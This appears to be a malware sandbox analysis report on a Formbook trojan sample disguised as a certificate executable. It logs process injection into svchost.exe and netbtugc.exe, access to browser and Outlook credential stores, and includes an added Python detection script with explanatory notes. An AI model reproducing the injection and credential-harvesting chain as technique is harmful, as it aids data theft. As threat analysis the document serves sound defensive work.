            Source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_008C3D19
            Source: Certificate 11-21AIS.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Certificate 11-21AIS.exe, 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_87013e52-8
            Source: Certificate 11-21AIS.exe, 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_251a9f00-0
            Source: Certificate 11-21AIS.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_7ed6aa7c-a
            Source: Certificate 11-21AIS.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_5d24bcba-1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042B363 NtClose | 1_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772B60 NtClose,LdrInitializeThunk | 1_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk | 1_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk | 1_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037735C0 NtCreateMutant,LdrInitializeThunk | 1_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03774340 NtSetContextThread | 1_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03774650 NtSuspendThread | 1_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772BF0 NtAllocateVirtualMemory | 1_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772BE0 NtQueryValueKey | 1_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772BA0 NtEnumerateValueKey | 1_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772B80 NtQueryInformationFile | 1_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772AF0 NtWriteFile | 1_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772AD0 NtReadFile | 1_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772AB0 NtWaitForSingleObject | 1_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772F60 NtCreateProcessEx | 1_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772F30 NtCreateSection | 1_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772FE0 NtCreateFile | 1_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772FB0 NtResumeThread | 1_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772FA0 NtQuerySection | 1_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772F90 NtProtectVirtualMemory | 1_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772E30 NtWriteVirtualMemory | 1_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772EE0 NtQueueApcThread | 1_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772EA0 NtAdjustPrivilegesToken | 1_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772E80 NtReadVirtualMemory | 1_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772D30 NtUnmapViewOfSection | 1_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772D10 NtMapViewOfSection | 1_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772D00 NtSetInformationFile | 1_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772DD0 NtDelayExecution | 1_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772DB0 NtEnumerateKey | 1_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772C60 NtCreateKey | 1_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772C00 NtQueryInformationProcess | 1_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772CF0 NtOpenProcess | 1_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772CC0 NtQueryVirtualMemory | 1_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772CA0 NtQueryInformationToken | 1_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03773010 NtOpenDirectoryObject | 1_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03773090 NtSetValueKey | 1_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037739B0 NtGetContextThread | 1_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03773D70 NtOpenThread | 1_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03773D10 NtOpenProcessToken | 1_2_03773D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F4340 NtSetContextThread,LdrInitializeThunk,3_2_035F4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F4650 NtSuspendThread,LdrInitializeThunk,3_2_035F4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2B60 NtClose,LdrInitializeThunk,3_2_035F2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_035F2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_035F2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_035F2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2AD0 NtReadFile,LdrInitializeThunk,3_2_035F2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2AF0 NtWriteFile,LdrInitializeThunk,3_2_035F2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2F30 NtCreateSection,LdrInitializeThunk,3_2_035F2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2FE0 NtCreateFile,LdrInitializeThunk,3_2_035F2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2FB0 NtResumeThread,LdrInitializeThunk,3_2_035F2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_035F2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_035F2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_035F2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_035F2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_035F2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_035F2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_035F2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2C60 NtCreateKey,LdrInitializeThunk,3_2_035F2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_035F2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F35C0 NtCreateMutant,LdrInitializeThunk,3_2_035F35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F39B0 NtGetContextThread,LdrInitializeThunk,3_2_035F39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2B80 NtQueryInformationFile,3_2_035F2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2AB0 NtWaitForSingleObject,3_2_035F2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2F60 NtCreateProcessEx,3_2_035F2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2F90 NtProtectVirtualMemory,3_2_035F2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2FA0 NtQuerySection,3_2_035F2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2E30 NtWriteVirtualMemory,3_2_035F2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2EA0 NtAdjustPrivilegesToken,3_2_035F2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2D00 NtSetInformationFile,3_2_035F2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2DB0 NtEnumerateKey,3_2_035F2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2C00 NtQueryInformationProcess,3_2_035F2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2CC0 NtQueryVirtualMemory,3_2_035F2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2CF0 NtOpenProcess,3_2_035F2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F3010 NtOpenDirectoryObject,3_2_035F3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F3090 NtSetValueKey,3_2_035F3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F3D70 NtOpenThread,3_2_035F3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F3D10 NtOpenProcessToken,3_2_035F3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7A70 NtReadFile,3_2_02BC7A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7BE0 NtClose,3_2_02BC7BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7B50 NtDeleteFile,3_2_02BC7B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7920 NtCreateFile,3_2_02BC7920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7D30 NtAllocateVirtualMemory,3_2_02BC7D30
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00906685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00906685
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008FACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_008FACC5
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009079D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function 03787E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function 0372B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function 037BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function 037AEA12 appears 86 times
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: String function 008EF8A0 appears 35 times
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: String function 008E6AC0 appears 42 times
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: String function 008DEC2F appears 68 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function 0362EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function 03607E54 appears 107 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function 035AB970 appears 262 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function 035F5130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function 0363F290 appears 103 times
Note: the five string-function counts in svchost.exe (58, 107, 262, 103, 86) recur in netbtugc.exe at addresses exactly 0x180000 lower (03775130 vs 035F5130, 03787E54 vs 03607E54, and so on), i.e. the same code is mapped in both processes at a different base, which is what the thread-injection and memory-mapping signatures above describe.
Source: Certificate 11-21AIS.exe, 00000000.00000003.1686058076.000000000397D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-21AIS.exe
Source: Certificate 11-21AIS.exe, 00000000.00000003.1688224868.0000000003823000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-21AIS.exe
Source: Certificate 11-21AIS.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23), matched in the following sources:
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@14/7
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090CE7A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008FAB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008FB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00906532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0091C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008C406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | File created: C:\Users\user\AppData\Local\Temp\autFF01.tmp
Source: Certificate 11-21AIS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: netbtugc.exe, 00000003.00000002.4143985977.0000000003107000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.2009565626.0000000003107000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Certificate 11-21AIS.exe | ReversingLabs: Detection: 60%
Source: unknown | Process created: C:\Users\user\Desktop\Certificate 11-21AIS.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Note: the second row launches svchost.exe with the sample's own path as its command line, so the image on disk and the command line disagree; together with the "Writes to foreign memory regions" and thread-injection signatures this is the host process into which the payload is injected.
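The process-creation rows above carry three patterns worth matching in telemetry: a system binary (svchost.exe) started by a Desktop executable with a command line that names a different image, a second system-directory binary (netbtugc.exe) started from a Program Files (x86) path, and a browser started by that binary (the report later shows firefox.exe reading profiles.ini). The Python below is an added example written for this page; it is not Joe Sandbox code. It parses rows in the format of this report, whether the two columns are separated by " | " or run together as extracted, and attaches findings to each spawn. The rule names and the BROWSERS set are assumptions of the example.

```python
"""Flag injection-style parent/child anomalies in 'Process created' rows.

Added example for this report; it is not Joe Sandbox code.  The rule names
and the BROWSERS set are assumptions made for the example.
"""
import ntpath
import re
from dataclasses import dataclass, field

# Rows constructed from the report above.  ROW_RE also accepts the extraction
# form in which the columns run together ("...exeProcess created: ...").
SAMPLE_ROWS = [
    r'Source: unknown | Process created: C:\Users\user\Desktop\Certificate 11-21AIS.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"',
    r'Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"',
    r'Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"',
    r'Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
]

ROW_RE = re.compile(
    r'Source:\s*(?P<parent>unknown|.+?\.exe)\s*\|?\s*'
    r'Process created:\s*(?P<image>[A-Za-z]:\\.+?\.exe)\s+"(?P<argv0>[^"]*)"',
    re.IGNORECASE,
)
WINDOWS_DIR = "C:\\Windows\\"
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}  # assumption


@dataclass
class Spawn:
    parent: str
    image: str
    argv0: str
    findings: list = field(default_factory=list)


def _under(path: str, prefix: str) -> bool:
    return path.lower().startswith(prefix.lower())


def parse_rows(rows):
    """Turn report rows into Spawn records; rows that do not match are skipped."""
    spawns = []
    for row in rows:
        m = ROW_RE.search(row)
        if m:
            spawns.append(Spawn(m["parent"].strip(), m["image"], m["argv0"]))
    return spawns


def analyze(spawns):
    """Attach findings to each spawn; checks run in a fixed order so output is stable."""
    for s in spawns:
        image_name = ntpath.basename(s.image).lower()
        argv0_name = ntpath.basename(s.argv0).lower()
        # 1. The command line names a different executable than the image that
        #    actually runs: the shape of a hollowed or injected host process.
        if argv0_name != image_name:
            s.findings.append("cmdline_image_mismatch")
        # 2. A binary under C:\Windows started by something outside it.
        if (_under(s.image, WINDOWS_DIR) and s.parent.lower() != "unknown"
                and not _under(s.parent, WINDOWS_DIR)):
            s.findings.append("system_image_untrusted_parent")
        # 3. A browser launched by a process living in a system directory.
        if image_name in BROWSERS and _under(s.parent, WINDOWS_DIR):
            s.findings.append("browser_spawned_by_system_dir_process")
    return spawns


if __name__ == "__main__":
    for s in analyze(parse_rows(SAMPLE_ROWS)):
        print(f"{ntpath.basename(s.parent)} -> {ntpath.basename(s.image)}: {s.findings or 'ok'}")
```

Rule 1 is the strongest of the three on its own: a legitimate svchost.exe is started by services.exe with an svchost.exe command line, never with a path under a user's Desktop. Rules 2 and 3 are context that raises confidence rather than stand-alone alerts.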
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Sections loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Sections loaded: iphlpapi.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll (winsqlite3.dll, vaultcli.dll and dpapi.dll match the browser and mail credential-harvesting signatures listed above)
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Certificate 11-21AIS.exe | Static file information: File size 1189888 > 1048576
Source: Certificate 11-21AIS.exe | Static PE information: data directory types: IMAGE_DIRECTORY_ENTRY_IMPORT, IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_BASERELOC, IMAGE_DIRECTORY_ENTRY_DEBUG, IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144260794.000000000098E000.00000002.00000001.01000000.00000004.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000000.1892574732.000000000098E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-21AIS.exe, 00000000.00000003.1686506113.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-21AIS.exe, 00000000.00000003.1687615785.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734120490.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1735560481.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1823543961.0000000003223000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1826364865.00000000033D2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-21AIS.exe, 00000000.00000003.1686506113.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-21AIS.exe, 00000000.00000003.1687615785.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1823927375.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734120490.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1735560481.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1823543961.0000000003223000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1826364865.00000000033D2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1790454232.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823610810.0000000003000000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000003.1760491789.000000000080C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4145972280.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000343C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2118473608.000000002492C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4145972280.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000343C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2118473608.000000002492C000.00000004.80000000.00040000.00000000.sdmp
